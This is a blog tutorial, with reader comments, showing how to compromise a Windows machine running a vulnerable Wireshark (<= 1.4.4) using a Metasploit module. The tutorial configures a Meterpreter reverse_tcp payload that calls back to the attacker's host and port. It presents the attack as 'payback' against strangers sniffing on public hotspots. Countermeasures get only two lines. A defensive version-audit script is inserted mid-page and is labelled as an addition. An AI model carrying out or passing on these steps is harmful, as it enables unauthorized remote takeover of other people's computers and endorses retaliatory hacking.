Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit + Backtrack 5 R1


Type : Tutorial

Level : Medium

Victim O.S : Windows 7 SP1 (all Windows versions are vulnerable)

Vulnerable Application : Wireshark <= 1.4.4

What is Wireshark?

Among people who like to learn about networking & security, maybe 95% of them already know this tool. According to Wikipedia, Wireshark is:

a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

For hacking purposes, this tool is usually used to capture packets (TCP/UDP) that cross a wired or wireless network.

When I'm in Bandung, Indonesia, and connected to a free hotspot service inside a mall or café, the firewall usually shows an alert every 5 minutes or less. That's because a lot of people there try scanning, collecting packets, intercepting the network, etc. Once I even saw someone playing with Wireshark on that hotspot.

As the story above shows, it is really uncomfortable to know that someone is collecting your data with Wireshark, hoping to get something important out of it.

In this tutorial, let's call it operation payback: the attacker is trying to collect our data, and we will pwn their computer… fair, isn't it? 🙂

Requirements :

1. Metasploit Framework

2. Operating System (I'm using Backtrack 5 R1 in this tutorial)

Step By Step Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit:

1. When you run Wireshark to collect data, you do not usually run it for a short time (1 or 2 minutes); you run it to collect as much data as possible. Collecting a large amount of data takes more time, while collecting only a little data takes only a little time.

2. In this case we will pwn the attacker who is using Wireshark to capture our data as it is sent across the network. Open Metasploit by typing msfconsole and use the wireshark_packet_dect exploit.

use exploit/windows/misc/wireshark_packet_dect

set payload windows/meterpreter/reverse_tcp

[Image: hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1]

3. To view the available options for this exploit, run the show options command from your msf console. In the following picture I set only the important options needed to perform this attack.

[Image: hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1]

Information:

set interface eth0 --> our network card interface; to find out whether you use wlan0 or eth0, run ifconfig from your Backtrack console

set lhost 192.168.8.92 --> the local computer you use to attack

set lport 443 --> the port on your local computer on which you want to receive the payload once the exploit has executed successfully

4. Before running the exploit command, let's say the attacker is still collecting data with Wireshark, as in the picture below.

[Image: hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1]

5. Now run the exploit command.

[Image: hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1]

Pwned!

FYI: this attack does not succeed 100% of the time. If no one on the network is using Wireshark to capture data, your exploit will return an error message.

Countermeasures :

1. Update your Wireshark to the latest version.

2. Use tunneling or encryption to protect your data.
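
For countermeasure 1, a small audit helper can flag capture hosts that still run an affected release. This is an added example, not part of the original tutorial; the threshold comes from the "Wireshark <= 1.4.4" line above, while the host names and version banners are constructed samples.

```python
import re

# Highest affected release according to this page ("Wireshark <= 1.4.4").
LAST_VULNERABLE = (1, 4, 4)

# Matches the version in banners such as "Wireshark 1.4.4 (SVN Rev ...)"
# or "TShark (Wireshark) 2.6.10"; these banner shapes are assumptions.
_BANNER = re.compile(
    r"(?:wireshark|tshark)\)?\s+v?(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE
)


def parse_version(banner):
    """Return (major, minor, patch) from a version banner, or None."""
    m = _BANNER.search(banner)
    if not m:
        return None
    # A missing patch component ("1.4") is treated as 0.
    return tuple(int(p) if p is not None else 0 for p in m.groups())


def classify(banner):
    """Return 'vulnerable', 'ok' or 'unknown' for one banner line."""
    version = parse_version(banner)
    if version is None:
        return "unknown"  # no version found: needs a manual check
    return "vulnerable" if version <= LAST_VULNERABLE else "ok"


def audit(inventory):
    """Map host -> verdict; inventory is {host: banner}."""
    return {host: classify(banner) for host, banner in inventory.items()}


# Constructed inventory (hypothetical host names and banners).
SAMPLE = {
    "ws-lab-01": "wireshark 1.4.4",
    "ws-lab-02": "TShark 1.4.5",
    "ws-lab-03": "Wireshark 1.2.15 (SVN Rev 35000)",
    "ws-lab-04": "TShark (Wireshark) 2.6.10 (Git v2.6.10)",
    "ws-lab-05": "tshark: command not found",
}

if __name__ == "__main__":
    for host, verdict in sorted(audit(SAMPLE).items()):
        print(f"{host}: {verdict}")
```

Hosts reported as "unknown" produced no parseable version and should be checked by hand rather than assumed safe.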

Hope it's useful 🙂

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Website: http://www.vishnuvalentino.com

  • puppet

    would u mind if u make a video for this method???

    • v4L

      #puppet
      emm..sorry I still didn’t have time to make it 😛

  • puppet

    hahaha…oke…
    let me the make make for you…;)

  • WoW, I never knew that Wireshark has vulnerabilities… Is there a way to prevent this attack while we are using Wireshark?

    • v4L

      #shunryu
      you can view it in the countermeasures

  • Oh sorry, I missed that info. Thanks for the very fast response. : )
    So, how can we detect Wireshark activities (what program can be used)?

    • v4L

      #Shunryu
      Now I’m sorry for the late response 🙂
      for checking wireshark activities actually you can do it with nmap. Next time I’ll write down the tutorial for it…


  • thanks for this good article..

  • sheik

    plz how to connect my data card that is unlocked modem in backtrack if u know the method means plz mail me axxosheik@gmail.com

  • dadsa

    can i with that hack wan?

    • v4L

      #dadsa
      I don’t think so.

  • SLam

    Hi all,
    I tried with Backtrack 5 to Win 7 and it doesn't work for me.

    • v4L

      #SLam
      your win7 needs to have a chipset that supports promiscuous mode to make wireshark capture the packet

  • vinay sharma

    Hi, i want to install skype in BT5r1, can you help me for that?